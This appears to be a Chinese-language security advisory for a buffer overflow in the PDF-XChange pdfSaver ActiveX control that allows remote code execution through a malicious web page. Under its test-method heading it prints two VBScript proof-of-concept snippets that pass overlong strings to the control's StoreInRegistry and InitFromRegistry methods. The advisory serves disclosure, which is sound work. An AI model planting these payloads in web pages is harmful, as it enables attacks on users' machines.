漏洞起因
边界条件错误
危险等级
低
影响系统
Tracker Software PDF-XChange pdfSaver ActiveX 3.60.0128
不受影响系统
危害
远程攻击者可以利用漏洞以应用程序上下文执行任意代码。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。
漏洞信息
PDF-XChange Viewer是一款PDF阅读软件。
PDF-XChange pdfSaver ActiveX控件存在缓冲区溢出问题,远程攻击者可以构建恶意WEB页,诱使用户解析,以应用程序上下文执行任意代码。
测试方法
<object classid=’clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18′ id=’zsl’ />
<script language=’vbscript’>
targetFile = “C:\PDF-XChange\pdfSaver\pdfxctrl.dll”
prototype = “Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_path As String )”
memberName = “StoreInRegistry”
progid = “pdfxctrlLib.PdfPrinterPreferences”
argCount = 2
arg1=1
arg2=String(6164, “A”)
zsl.StoreInRegistry arg1 ,arg2
</script>
——————–
<object classid=’clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18′ id=’zsl’ />
<script language=’vbscript’>
targetFile = “C:\PDF-XChange\pdfSaver\pdfxctrl.dll”
prototype = “Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_key As String )”
memberName = “InitFromRegistry”
progid = “pdfxctrlLib.PdfPrinterPreferences”
argCount = 2
arg1=1
arg2=String(14356, “A”)
zsl.InitFromRegistry arg1 ,arg2
</script>
厂商解决方案
目前没有详细解决方案提供:
http://www.tracker-software.com/product/pdf-xchange-viewer
漏洞提供者
LiquidWorm
评论关闭。